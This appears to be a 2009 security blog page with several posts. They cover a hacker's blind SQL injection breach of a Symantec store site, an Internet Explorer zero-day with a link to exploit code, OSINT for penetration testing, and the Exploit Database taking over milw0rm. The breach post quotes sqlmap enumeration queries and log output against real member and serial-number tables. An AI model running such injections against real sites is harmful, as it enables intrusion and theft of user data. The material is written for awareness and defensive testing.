Ah, So True!

Symantec Website Comprised via Blind SQLi

February 9, 2009, a hacker going by the alias Unu was able to compromise a website run and owned by Kaspersky Labs using a SQL injection attack. Well, Unu has struck again by successfully attacking a website owned by Symantec using a Blind SQLi vector!!!!

Unu employed two commonly known tools to successfully perform the attack: pangolin and sqlmap

Not familiar with these tools? You should be and should be actively checking your websites with them to find your weaknesses before the attackers do. I personally stay attuned to the tools and techniques of the underground. Most attackers cannot afford expensive tools like Core Impact or HP WebInspect (unless using a pirated copy) so they resort to building tools and scripts that automate tedious yet effective and focused attack techniques. It is important to use the same types of tools that the threat is using, especially if you have no budget or a very limited budget! The Kaspersky and Symantec compromises highlight this fact!

From the words of Unu, "It is clear that we are on Symantec server. Oasis, Northwind, OneCare, etc are important projects Symantec. But they seemed to me particularly interesting 2 databases, highlighted in red in the picture, one related to Norton and Symantecstore. Nortonplus database is huge, contains 91 tables. I will enumerate, without further details."

"One of the tables is TB_MEMBER, which contains 70,356 rows, the data members (for help “I called the tool’s sqlmap)

[16:27:41] [INFO] fetching number of columns ‘M_EMAIL, M_NAME, M_PASS, M_USERID’
entries for table ‘TB_MEMBER’ on database ’symantecstore’
[16:27:41] [INFO] query: SELECT ISNULL(CAST(LTRIM(STR(COUNT(*))) AS VARCHAR(8000
)), CHAR(32)) FROM symantecstore..TB_MEMBER
[16:27:41] [INFO] retrieved: 70356

We randomly selected 6 users, from number 100 to 105, in the table. I was outraged when I saw the result shown by sqlmap. These users passwords are stored in CLEAR TEXT!!!!!!!. (To protect users of those data, we replaced some letters with X’s)"

"And when we put sqlmap’s tool to work, there is little surprise us to find that this table contain 122,152 of Serial Number.

[16:39:22] [INFO] fetching number of columns ‘ProductName, ProductNumber, Serial Number’ entries for table ‘TB_ORDER’ on database ’symantecstore’ [16:39:22] [INFO] query: SELECT ISNULL(CAST(LTRIM(STR(COUNT(*))) AS VARCHAR(8000 )), CHAR(32)) FROM symantecstore..TB_ORDER [16:39:22] [INFO] retrieved: 122152"

SQL Injection is NOT a new issue yet I see a significant number of SQLi vectors posted in malicious forums on a daily basis!

I found data on SQL Injection in the Open Source Vulnerability Database (OSVDB) beginning in 2000. As seen in the graphic above, the threat world began to heavily focus on SQLi vectors in 2005 and has continued to focus on this issue since.

Why are we not getting ahead of this problem? It is time to stop talking about SDLC and start doing it!

Resources:

Guide to Building Secure Web Applications and Web Services (Development Guide)

OWASP Testing Guide V3.0

Top SQL Injection Tools

0-Day for Internet Explorer Released

Microsoft IE CSS Parsing writing-mode Style Memory Corruption

A vulnerability has been identified in Microsoft Internet Explorer, which could be exploited by attackers to compromise a vulnerable system. This issue is caused by a dangling pointer in the Microsoft HTML Viewer (mshtml.dll) when retrieving certain CSS/STYLE objects via the "getElementsByTagName()" method, which could allow attackers to crash an affected browser or execute arbitrary code by tricking a user into visiting a malicious web page.

Affected Products
Microsoft Internet Explorer 7
Microsoft Internet Explorer 6

Exploit
http://downloads.securityfocus.com/vulnerabilities/exploits/37085.html

Cloud Computing Risk Assessment

ENISA, supported by a group of subject matter expert comprising representatives from Industries, Academia and Governmental Organizations, has conducted, in the context of the Emerging and Future Risk Framework project, an risks assessment on cloud computing business model and technologies. The result is an in-depth and independent analysis that outlines some of the information security benefits and key security risks of cloud computing. The report provide also a set of practical recommendations.

Open Source Intelligence Gathering for Pentesting

Wikipedia defines Open Source Intelligence (OSINT) as, "Open source intelligence (OSINT) is a form of intelligence collection management that involves finding, selecting, and acquiring information from publicly available sources and analyzing it to produce actionable intelligence."

A basic form of OSINT was recently used by a group to burglarize celebrities:

"The group, most 18 and 19 years old, used celebrity Web sites, according to investigators, to figure out when their victims — a roster of young Hollywood that also includes Rachel Bilson of “The O.C.,” Ashley Tisdale of “High School Musical” fame and Audrina Patridge of “The Hills”— would be attending premieres and other events and would therefore not be home."

So, what does this have to do with penetration testing? Very rarely do I see a company or talk to individuals that use Competitive Intelligence (CI) or OSINT activities in their testing methodology. This type of activity has been defined in the OSSTMM or the Penetration Testing Framework. Do you know what type of information exists on the Internet about your company (or yourself) that could be used for an attack?

Prior to tools like Maltego, this was a tedious process using tools for individual tasks. A comprehensive list of valuable tools can be found linked in the Penetration Testing Framework under the "Network Footprinting" section. Download them, use them, and think about how the data that they collect could be used to attack you. I bet you may find something that will surprise you!

Milw0rm Dead?!?

We know for sure the Str0ke, the maintainer of the popular exploit database called milw0rm, is not dead. But what about the milw0rm database? Based on the milw0rm website, RSS feed, and twitter, it appears dead. No need to worry, the folks at OffSec announced that they are taking over milw0rm from str0ke, along with David Kennedy and others.


"The Exploit Database is up and running…survived day 1 . On a last moment fluke, we registered the domain explo.it, which is now also up and running.

The ultimate archive of exploits and vulnerable software and a great resource for vulnerability researchers and security addicts alike. Our aim is to collect exploits from submittals and various mailing lists and concentrate them in one, easy to navigate database. When possible, we've added the vulnerable software for download. We are still in the process of organizing the database. You can Download the relevant exploit by clicking the "D" and when available, download the Vulnerable Application using the "A" link."

We’ve improved the search functions on the site, and imported the “papers” and “shellcode” sections from Milw0rm. We’ve been getting our fist submissions and are processing them almost in real time. We’ve set up an IRC channel on freenode #exploitdb, you are welcome to join in and provide feedback on the database."

There is an Offensive Security Exploit database search plugin, that can be downloaded at:

https://addons.mozilla.org/en-US/firefox/addon/49858/

114 PERL Tools for Enumeration and Testing

A great post on the PenTestIT blog listing 114 PERL tools that can be used for enumeration and security / penetration testing. These are complimentary tools to be used in your security toolkit.

You might find that you rely on some of the tools as your main tool of choice and some may be used as secondary checks.

Need a methodology for security testing, check out the Open Source Security Testing Methodology Manual (OSSTMM) or the Information Systems Security Assessment Framework (ISSAF).